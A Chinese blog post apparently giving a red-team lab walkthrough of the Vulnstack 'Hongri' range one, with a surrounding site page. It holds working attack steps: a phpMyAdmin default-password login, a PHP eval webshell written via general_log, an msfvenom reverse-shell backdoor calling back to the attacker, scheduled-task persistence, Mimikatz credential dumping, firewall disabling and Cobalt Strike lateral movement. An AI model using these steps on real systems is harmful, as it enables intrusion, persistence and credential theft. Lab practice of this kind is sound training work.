<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>ATT&amp;CK红队评估实战靶场一 | 子夜旅馆</title>
  <meta name="keywords" content=" 靶场 ">
  <meta name="description" content="ATT&amp;CK红队评估实战靶场一 | 子夜旅馆">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="子夜旅馆">
<meta property="og:type" content="website">
<meta property="og:title" content="about">
<meta property="og:url" content="https://sunwu57.github.io/about/index.html">
<meta property="og:site_name" content="子夜旅馆">
<meta property="og:description" content="子夜旅馆">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-03-24T13:10:23.000Z">
<meta property="article:modified_time" content="2023-03-24T13:10:23.260Z">
<meta property="article:author" content="ziyebuku">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/bikabika.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 5.4.2"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/bikabika.jpg"/>
</a>
<div class="author">
    <span>ziyebuku</span>
</div>

<div class="icon">
    
        
    
        
            <a title="github"
               href="https://github.com/sunwu57"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:1210396142@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1210396142&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
</div>



    <a class="more-menus">更多菜单</a>


<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(20)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="杂文">
                        
                        杂文
                        <small>(13)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="web">
                        
                        web
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="红队">
                        
                        红队
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="渗透">
                        
                        渗透
                        <small>(4)</small>
                        
                    </div>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
                <a class="dynamic-menu "
                   target="_self"
                   
                   href="http://DeelMind.com/">DeelMind</a>
        
            
                <a class="dynamic-menu "
                   target="_self"
                   
                   href="http://sunwu.world/">子夜旅馆</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="http://pan.sunwu.world/">子夜旅馆的网盘</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="https://github.com/sunwu57">github</a>
        
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="20">
<input type="hidden" id="yelog_site_word_count" value="25.7k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://sunwu.world/">子夜旅馆</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>靶场</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>服务器</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>格言</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>护网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>免杀</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>权限维持</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>群晖</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>bing</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>blog</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>C#</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>C++</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>chatGPT</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>go</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hw</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>markdown</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>mysql</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>typora</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/11/30/test1/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="test1">test1</span>
            <span class="post-date" title="2023-11-30 14:11:38">2023/11/30</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/05/21/mysql%E5%AE%89%E8%A3%85/"
           data-tag="mysql"
           data-author="" >
            <span class="post-title" title="mysql安装">mysql安装</span>
            <span class="post-date" title="2023-05-21 21:48:56">2023/05/21</span>
        </a>
        
        
        <a id="top" class="全部文章 红队 "
           href="/2023/05/13/%E5%85%8D%E6%9D%80%E7%AC%AC%E4%BA%8C%E8%AF%BE/"
           data-tag="免杀,go,C++,C#"
           data-author="" >
            <span class="post-title" title="免杀第二课">免杀第二课</span>
            <span class="post-date" title="2023-05-13 16:21:12">2023/05/13</span>
        </a>
        
        
        <a id="top" class="全部文章 红队 "
           href="/2023/05/10/%E5%85%8D%E6%9D%80%E7%AC%AC%E4%B8%80%E8%AF%BE/"
           data-tag="免杀,go"
           data-author="" >
            <span class="post-title" title="免杀第一课">免杀第一课</span>
            <span class="post-date" title="2023-05-10 05:14:38">2023/05/10</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/05/09/%E7%AC%AC%E4%B8%80%E4%B8%AA%E6%9C%8D%E5%8A%A1%E5%99%A8/"
           data-tag="服务器"
           data-author="" >
            <span class="post-title" title="第一个服务器">第一个服务器</span>
            <span class="post-date" title="2023-05-09 20:34:08">2023/05/09</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/05/07/%E7%BE%A4%E6%99%96%E8%BF%9B%E8%A1%8CDDNS%E8%A7%A3%E6%9E%90/"
           data-tag="群晖"
           data-author="" >
            <span class="post-title" title="群晖进行DDNS解析">群晖进行DDNS解析</span>
            <span class="post-date" title="2023-05-07 21:18:57">2023/05/07</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/04/13/hackerone%E6%8C%96%E6%B4%9E%E4%B9%8B%E6%97%85/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="hackerone挖洞之旅">hackerone挖洞之旅</span>
            <span class="post-date" title="2023-04-13 14:34:37">2023/04/13</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/04/10/%E6%8A%A4%E7%BD%91%E9%A2%98%E5%BA%93/"
           data-tag="护网,hw"
           data-author="" >
            <span class="post-title" title="2023年护网题库">2023年护网题库</span>
            <span class="post-date" title="2023-04-10 15:38:32">2023/04/10</span>
        </a>
        
        
        <a id="top" class="全部文章 渗透 "
           href="/2023/03/29/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%BA%94/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="ATT&amp;CK红队评估实战靶场五">ATT&amp;CK红队评估实战靶场五</span>
            <span class="post-date" title="2023-03-29 20:24:27">2023/03/29</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/03/28/%E6%A0%BC%E8%A8%80/"
           data-tag="格言"
           data-author="" >
            <span class="post-title" title="格言">格言</span>
            <span class="post-date" title="2023-03-28 10:17:45">2023/03/28</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/03/26/%E5%88%A9%E7%94%A8github%E6%90%AD%E5%BB%BAhexo%E5%8D%9A%E5%AE%A2/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="利用github搭建hexo博客~">利用github搭建hexo博客~</span>
            <span class="post-date" title="2023-03-26 23:58:54">2023/03/26</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/03/25/markdown%E8%AF%AD%E6%B3%95/"
           data-tag="markdown,typora"
           data-author="" >
            <span class="post-title" title="markdown语法">markdown语法</span>
            <span class="post-date" title="2023-03-25 10:50:49">2023/03/25</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/05/02/%E4%BD%BF%E7%94%A8chatGPT%E5%86%99%E8%AE%BA%E6%96%87%E6%96%B9%E6%B3%95/"
           data-tag="chatGPT"
           data-author="" >
            <span class="post-title" title="使用chatGPT写论文的方法">使用chatGPT写论文的方法</span>
            <span class="post-date" title="2023-05-02 15:44:22">2023/05/02</span>
        </a>
        
        
        <a  class="全部文章 渗透 "
           href="/2023/03/30/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%BA%8C/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="ATT&amp;CK红队评估实战靶场二">ATT&amp;CK红队评估实战靶场二</span>
            <span class="post-date" title="2023-03-30 14:36:43">2023/03/30</span>
        </a>
        
        
        <a  class="全部文章 渗透 "
           href="/2023/03/30/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%B8%80/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="ATT&amp;CK红队评估实战靶场一">ATT&amp;CK红队评估实战靶场一</span>
            <span class="post-date" title="2023-03-30 14:34:52">2023/03/30</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/29/markdown%E4%BB%A3%E7%A0%81%E6%AE%B5%E6%8A%98%E5%8F%A0%E8%AF%AD%E6%B3%95/"
           data-tag="markdown"
           data-author="" >
            <span class="post-title" title="markdown代码段折叠语法">markdown代码段折叠语法</span>
            <span class="post-date" title="2023-03-29 18:34:09">2023/03/29</span>
        </a>
        
        
        <a  class="全部文章 渗透 "
           href="/2023/03/29/vulnhub-FOWSNIFF%E9%9D%B6%E6%9C%BA/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="vulnhub-FOWSNIFF靶机">vulnhub-FOWSNIFF靶机</span>
            <span class="post-date" title="2023-03-29 18:14:04">2023/03/29</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/27/%E7%99%BE%E5%88%86%E7%99%BE%E8%BF%9B%E8%A1%8Cnew-bing%E8%81%8A%E5%A4%A9%EF%BC%8C%E8%B7%B3%E8%BF%87%E5%80%99%E8%A1%A5%E5%90%8D%E5%8D%95/"
           data-tag="bing"
           data-author="" >
            <span class="post-title" title="百分百进行new bing聊天，跳过候补名单">百分百进行new bing聊天，跳过候补名单</span>
            <span class="post-date" title="2023-03-27 15:16:00">2023/03/27</span>
        </a>
        
        
        <a  class="全部文章 web "
           href="/2023/03/25/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/"
           data-tag="权限维持"
           data-author="" >
            <span class="post-title" title="权限维持">权限维持</span>
            <span class="post-date" title="2023-03-25 16:39:15">2023/03/25</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/23/typora+PicGo+LskyPro+Obsidian%E5%AE%9E%E7%8E%B0%E6%96%87%E7%AB%A0%E7%AE%A1%E7%90%86/"
           data-tag="blog"
           data-author="" >
            <span class="post-title" title="typora+PicGo+LskyPro+Obsidian实现文章管理">typora+PicGo+LskyPro+Obsidian实现文章管理</span>
            <span class="post-date" title="2023-03-23 22:37:16">2023/03/23</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-ATT-CK红队评估实战靶场一" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">ATT&amp;CK红队评估实战靶场一</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="渗透">渗透</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color3">靶场</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2023-03-30 14:43:42'>2023-03-30 14:34</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:792</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%B6%E5%9C%BA%E4%BF%A1%E6%81%AF"><span class="toc-text">靶场信息</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E7%AB%99%E8%8E%B7%E5%8F%96%E6%9D%83%E9%99%90"><span class="toc-text">网站获取权限</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#phpmyadmin%E8%8E%B7%E6%9D%83"><span class="toc-text">phpmyadmin获权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-%E6%8F%90%E5%8D%87"><span class="toc-text">权限维持&#x2F;提升</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">内网信息收集</span></a></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="靶场信息"><a href="#靶场信息" class="headerlink" title="靶场信息"></a>靶场信息</h2><p>这个靶场是红日安全，红队第一个靶机，          密码:hongrisec@2019<br>由四台虚拟机组成win2k3/win7/win2008/kali<br>kali(vm8)攻击机                             192.168.21.128<br>win7(vm2/8)对外边界服务器       192.168.52.143/192.168.21.146   开启phpstudy即可<br>win2k3(vm2)域成员                       192.168.52.141<br>win2008(vm2)域靶机                    192.168.52.138</p>
<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><ol>
<li>arp-scan -l或者nmap -sU –script nbstat.nse -p137 -T4 192.168.21.128/24</li>
<li>nmap -T4 -f -sS -p- 192.168.21.146<br>Not shown: 65523 closed ports<br>PORT STATE SERVICE<br>80/tcp open http<br>135/tcp open msrpc<br>139/tcp open netbios-ssn<br>445/tcp open microsoft-ds<br>1025/tcp open NFS-or-IIS<br>1026/tcp open LSA-or-nterm<br>1027/tcp open IIS<br>1028/tcp open unknown<br>1030/tcp open iad1<br>1031/tcp open iad2<br>3306/tcp open mysql<br>5357/tcp open wsdapi<br>MAC Address: 00:0C:29:4F:8D:05 (VMware)</li>
<li>对80/135/445/3306端口进行测试</li>
<li>dirsearch -u 192.168.21.140<br>dirb  <a target="_blank" rel="noopener" href="http://192.168.21.140/">http://192.168.21.140</a><br>gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -u <a target="_blank" rel="noopener" href="http://192.168.21.140/">http://192.168.21.140</a><br>目录扫描获取<br>[21:16:08] 200 - 2KB - /phpmyadmin/README<br>[21:16:09] 200 - 32KB - /phpmyadmin/ChangeLog<br>[21:16:10] 200 - 4KB - /phpMyAdmin/index.php</li>
</ol>
<h3 id="网站获取权限"><a href="#网站获取权限" class="headerlink" title="网站获取权限"></a>网站获取权限</h3><h4 id="phpmyadmin获权"><a href="#phpmyadmin获权" class="headerlink" title="phpmyadmin获权"></a>phpmyadmin获权</h4><ol>
<li>登录<a target="_blank" rel="noopener" href="http://192.168.21.146/phpmyadmin/%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81root:root">http://192.168.21.146/phpmyadmin/默认密码root:root</a></li>
<li>show variables like ‘%secure_file%’;   查看是否有任意位置读写文件权限<br>null  发现没权限into outfile<br>show variables like ‘%general%’; #查看日志状<br>SET GLOBAL general_log=’on’ #开启general<br>set global general_log_file=’C:/phpstudy/www/cmd.php’; #将路径改为<br>SELECT “<?PHP @EVAL($_POST['zyx']);?>“ #一句话木马</li>
<li>写马成功，蚁剑登录</li>
</ol>
<h4 id="权限维持-提升"><a href="#权限维持-提升" class="headerlink" title="权限维持/提升"></a>权限维持/提升</h4><ol>
<li>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.21.128 lpost=4444 -f exe -o 1.exe      #msf产生后门   蚁剑执行</li>
<li>use exploit/multi/handler<br>set payload<br>set lhost<br>run监听</li>
<li>获得权限shell      chcp  65001去除乱码<br>schtasks /create /tn solrindex  “ma” /tr C:\phpstudy\www\1.exe /sc minute /mo 1（windows添加<a target="_blank" rel="noopener" href="https://blog.csdn.net/Jasonliujintao/article/details/80397116">计划任务</a>每分钟执行一次）<br>getsystem<br>ps<br>migrate  520                 注入到一个system的进程里<br>run persistence -X -i 50 -p 4444 -r 192.168.21.128</li>
</ol>
<h4 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h4><ol>
<li>load kiwi<br>creds_all     获取Administrator GOD hongrisec@2019</li>
<li>判断域信息<br>whoami        #god/administrator查看当前权限<br>hostname     #stu1显示主机名称<br>net user        #Administrator Guest liukaifeng01查询用户列表<br>net localgroup administrators   #Administrator;liukaifeng01获取本地管理员（通常包含域用户）信息<br>systeminfo   #使用systeminfo查看系统详细信息<br>shell tasklist   #查询进程列表,看看有没有杀毒软件进程ipconfig            #dns为god.org域和dns一般为同一台主机<br>net view            #查看域信息\OWA\ROOTTVI862UBEH\STU1<br>net config workstation     #查看当前登录域及登录用户信息GOD<br>net view /domain  #查询域GOD<br>net view /domain:GOD     #查询 GOD域内全部主机\OWA\ROOT-TVI862UBEH\STU1</li>
</ol>
<table>
<thead>
<tr>
<th>进程名</th>
<th>软件</th>
</tr>
</thead>
<tbody><tr>
<td>360sd.exe</td>
<td>360 杀毒</td>
</tr>
<tr>
<td>360tray.exe</td>
<td>360 实时保护</td>
</tr>
<tr>
<td>ZhuDongFangYu.exe</td>
<td>360 主动防御</td>
</tr>
<tr>
<td>KSafeTray.exe</td>
<td>金山卫士</td>
</tr>
<tr>
<td>SafeDogUpdateCenter.exe</td>
<td>安全狗</td>
</tr>
<tr>
<td>McAfee</td>
<td>McShield.exe</td>
</tr>
<tr>
<td>egui.exe</td>
<td>NOD32</td>
</tr>
<tr>
<td>AVP.exe</td>
<td>卡巴斯基</td>
</tr>
<tr>
<td>avguard.exe</td>
<td>小红伞</td>
</tr>
<tr>
<td>bdagent.exe</td>
<td>BitDefender</td>
</tr>
</tbody></table>
<ol>
<li>cs上线<br>SMB Beacon有两种使用方式：这里我们使用第二种方式，创建SMB监听：</li>
</ol>
<ul>
<li><ul>
<li>直接派生一个孩子，目的为了进一步盗取hash</li>
<li>在已有的beacon上创建监听，用来作为跳板进行内网渗透</li>
</ul>
</li>
</ul>
<ol>
<li>关闭防火墙shell netsh firewall show state<br>shell netsh advfirewall set allprofiles state off</li>
<li>之后利用cs，网络扫描，进行上图操作，获取hash，迷糊桃，获取其他机器密码</li>
<li>密码192.168.52.138，成功获得域控权限，同理获得2003权限，渗透结束<img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303301443848.png" alt="img"></li>
<li>文章参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_46527080/article/details/112648202">1</a>.<a target="_blank" rel="noopener" href="https://www.cnblogs.com/Cl0ud/p/13769940.html">2</a>.<a target="_blank" rel="noopener" href="https://blog.csdn.net/zy15667076526/article/details/115672287?ops_request_misc=%7B%22request_id%22:%22164705013016780261925621%22,%22scm%22:%2220140713.130102334.pc_all.%22%7D&request_id=164705013016780261925621&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-8-115672287.pc_search_result_control_group&utm_term=vulnstack&spm=1018.2226.3001.4187">3</a>.<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_65244586/article/details/122631373?ops_request_misc=&request_id=&biz_id=102&utm_term=vulnstack&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-1-122631373.nonecase&spm=1018.2226.3001.4187">4</a>.<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_37043565/article/details/106505565">5</a>.<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_46527080/article/details/112648202">6</a><br>cs使用<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44677409/article/details/102725129">1</a>.<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_38348692/article/details/99705306">2</a>.<a target="_blank" rel="noopener" href="https://www.cnblogs.com/k1ng/p/12168709.html">3</a></li>
</ol>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 1210396142@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>


<div class="article_copyright">
    <p><span class="copy-title">文章标题:</span>ATT&amp;CK红队评估实战靶场一</p>
    <p><span class="copy-title">字数:</span><span class="post-count">792</span></p>
    <p><span class="copy-title">本文作者:</span><a  title="ziyebuku">ziyebuku</a></p>
    <p><span class="copy-title">发布时间:</span>2023-03-30, 14:34:52</p>
    <p><span class="copy-title">最后更新:</span>2023-03-30, 14:43:42</p>
    <span class="copy-title">原始链接:</span><a class="post-url" href="/2023/03/30/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%B8%80/" title="ATT&amp;CK红队评估实战靶场一">https://sunwu57.github.io/2023/03/30/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%B8%80/</a>
    <p>
        <span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">&#34;署名-非商用-相同方式共享 4.0&#34;</a> 转载请保留原文链接及作者。
    </p>
</div>





    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2025 ziyebuku
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>






